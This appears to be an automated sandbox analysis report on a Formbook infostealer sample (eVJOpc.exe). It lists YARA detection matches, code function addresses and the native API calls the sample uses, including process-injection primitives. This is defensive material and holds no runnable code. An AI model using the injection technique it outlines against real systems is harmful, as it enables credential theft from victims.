Source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000001.370883277.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.369496333.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.402139557.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.452190143.0000000000590000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000000.367914995.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.452060611.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.374253259.000000000F040000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: powershell.exe PID: 6124, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 8_2_004030FB
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0493E758 1_2_0493E758
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0493C828 1_2_0493C828
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0493C848 1_2_0493C848
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07943510 1_2_07943510
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07940040 1_2_07940040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07947988 1_2_07947988
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_07940006 1_2_07940006
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004047D3 8_2_004047D3
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004061D4 8_2_004061D4
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10007AC0 8_2_10007AC0
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000BA02 8_2_1000BA02
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_1000BA11 8_2_1000BA11
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00401030 9_2_00401030
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041B8B3 9_2_0041B8B3
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041C10F 9_2_0041C10F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041C19E 9_2_0041C19E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041C2BC 9_2_0041C2BC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041C4E6 9_2_0041C4E6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00408C90 9_2_00408C90
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00408C95 9_2_00408C95
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00402D88 9_2_00402D88
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00402D90 9_2_00402D90
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_0041CFFA 9_2_0041CFFA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00402FB0 9_2_00402FB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B720A0 9_2_00B720A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5B090 9_2_00B5B090
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C128EC 9_2_00C128EC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C120A8 9_2_00C120A8
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01002 9_2_00C01002
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1E824 9_2_00C1E824
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B64120 9_2_00B64120
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4F900 9_2_00B4F900
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C122AE 9_2_00C122AE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFFA2B 9_2_00BFFA2B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7EBB0 9_2_00B7EBB0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0DBD2 9_2_00C0DBD2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C003DA 9_2_00C003DA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C12B28 9_2_00C12B28
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0D466 9_2_00C0D466
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5841F 9_2_00B5841F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C125DD 9_2_00C125DD
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5D5E0 9_2_00B5D5E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B40D20 9_2_00B40D20
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C11D55 9_2_00C11D55
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C12D07 9_2_00C12D07
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C12EF7 9_2_00C12EF7
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B66E30 9_2_00B66E30
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0D616 9_2_00C0D616
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1DFCE 9_2_00C1DFCE
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C11FF1 9_2_00C11FF1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00401030 9_1_00401030
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041B8B3 9_1_0041B8B3
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041C10F 9_1_0041C10F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041C19E 9_1_0041C19E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041C2BC 9_1_0041C2BC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041C4E6 9_1_0041C4E6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00408C90 9_1_00408C90
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00408C95 9_1_00408C95
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00402D88 9_1_00402D88
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00402D90 9_1_00402D90
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_0041CFFA 9_1_0041CFFA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00402FB0 9_1_00402FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A2B28 19_2_033A2B28
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339231B 19_2_0339231B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FAB40 19_2_032FAB40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0337CB4F 19_2_0337CB4F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330EBB0 19_2_0330EBB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FEB9A 19_2_032FEB9A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330138B 19_2_0330138B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0337EB8A 19_2_0337EB8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03328BE8 19_2_03328BE8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033823E3 19_2_033823E3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033903DA 19_2_033903DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330ABD8 19_2_0330ABD8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339DBD2 19_2_0339DBD2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0338FA2B 19_2_0338FA2B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB236 19_2_032FB236
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03395A4F 19_2_03395A4F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A32A9 19_2_033A32A9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A22AE 19_2_033A22AE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339E2C5 19_2_0339E2C5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F4120 19_2_032F4120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DF900 19_2_032DF900
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033AE824 19_2_033AE824
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA830 19_2_032FA830
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D6800 19_2_032D6800
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03391002 19_2_03391002
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033020A0 19_2_033020A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A20A8 19_2_033A20A8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032EB090 19_2_032EB090
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033960F5 19_2_033960F5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A28EC 19_2_033A28EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A1FF1 19_2_033A1FF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033967E2 19_2_033967E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033ADFCE 19_2_033ADFCE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F6E30 19_2_032F6E30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339D616 19_2_0339D616
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F5600 19_2_032F5600
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03381EB6 19_2_03381EB6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A2EF7 19_2_033A2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033006C0 19_2_033006C0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D0D20 19_2_032D0D20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A2D07 19_2_033A2D07
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A1D55 19_2_033A1D55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033065A0 19_2_033065A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03302581 19_2_03302581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03392D82 19_2_03392D82
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032ED5E0 19_2_032ED5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A25DD 19_2_033A25DD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032E841F 19_2_032E841F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339CC77 19_2_0339CC77
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB477 19_2_032FB477
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339D466 19_2_0339D466
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394496 19_2_03394496
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009B8C90 19_2_009B8C90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009B8C95 19_2_009B8C95
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009B2D90 19_2_009B2D90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009B2D88 19_2_009B2D88
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009B2FB0 19_2_009B2FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_009CCFFA 19_2_009CCFFA
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 03365720 appears 44 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 032DB150 appears 177 times
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 0332D08C appears 45 times
Source: C:\Users\Public\eVJOpc.exe Code function: String function: 0041A4B0 appears 40 times
Source: C:\Users\Public\eVJOpc.exe Code function: String function: 00B4B150 appears 45 times
Contains functionality to call native functions
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004185D0 NtCreateFile, 9_2_004185D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00418680 NtReadFile, 9_2_00418680
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00418700 NtClose, 9_2_00418700
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004187B0 NtAllocateVirtualMemory, 9_2_004187B0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004186FA NtClose, 9_2_004186FA
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_004187AB NtAllocateVirtualMemory, 9_2_004187AB
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B898F0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_00B898F0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89860 NtQuerySystemInformation,LdrInitializeThunk, 9_2_00B89860
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89840 NtDelayExecution,LdrInitializeThunk, 9_2_00B89840
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B899A0 NtCreateSection,LdrInitializeThunk, 9_2_00B899A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89910 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_00B89910
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A20 NtResumeThread,LdrInitializeThunk, 9_2_00B89A20
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A00 NtProtectVirtualMemory,LdrInitializeThunk, 9_2_00B89A00
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A50 NtCreateFile,LdrInitializeThunk, 9_2_00B89A50
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B895D0 NtClose,LdrInitializeThunk, 9_2_00B895D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89540 NtReadFile,LdrInitializeThunk, 9_2_00B89540
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B896E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_00B896E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89660 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_00B89660
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B897A0 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_00B897A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89780 NtMapViewOfSection,LdrInitializeThunk, 9_2_00B89780
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89FE0 NtCreateMutant,LdrInitializeThunk, 9_2_00B89FE0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89710 NtQueryInformationToken,LdrInitializeThunk, 9_2_00B89710
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B898A0 NtWriteVirtualMemory, 9_2_00B898A0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89820 NtEnumerateKey, 9_2_00B89820
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8B040 NtSuspendThread, 9_2_00B8B040
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B899D0 NtCreateProcessEx, 9_2_00B899D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89950 NtQueueApcThread, 9_2_00B89950
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A80 NtOpenDirectoryObject, 9_2_00B89A80
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89A10 NtQuerySection, 9_2_00B89A10
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8A3B0 NtGetContextThread, 9_2_00B8A3B0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89B00 NtSetValueKey, 9_2_00B89B00
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B895F0 NtQueryInformationFile, 9_2_00B895F0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8AD30 NtSetContextThread, 9_2_00B8AD30
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89520 NtWaitForSingleObject, 9_2_00B89520
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89560 NtWriteFile, 9_2_00B89560
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B896D0 NtCreateKey, 9_2_00B896D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89610 NtEnumerateValueKey, 9_2_00B89610
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89670 NtQueryInformationProcess, 9_2_00B89670
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89650 NtQueryValueKey, 9_2_00B89650
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89730 NtQueryVirtualMemory, 9_2_00B89730
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8A710 NtOpenProcessToken, 9_2_00B8A710
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89770 NtSetInformationFile, 9_2_00B89770
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B8A770 NtOpenThread, 9_2_00B8A770
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B89760 NtOpenProcess, 9_2_00B89760
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004185D0 NtCreateFile, 9_1_004185D0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00418680 NtReadFile, 9_1_00418680
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_00418700 NtClose, 9_1_00418700
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004187B0 NtAllocateVirtualMemory, 9_1_004187B0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_1_004186FA NtClose, 9_1_004186FA
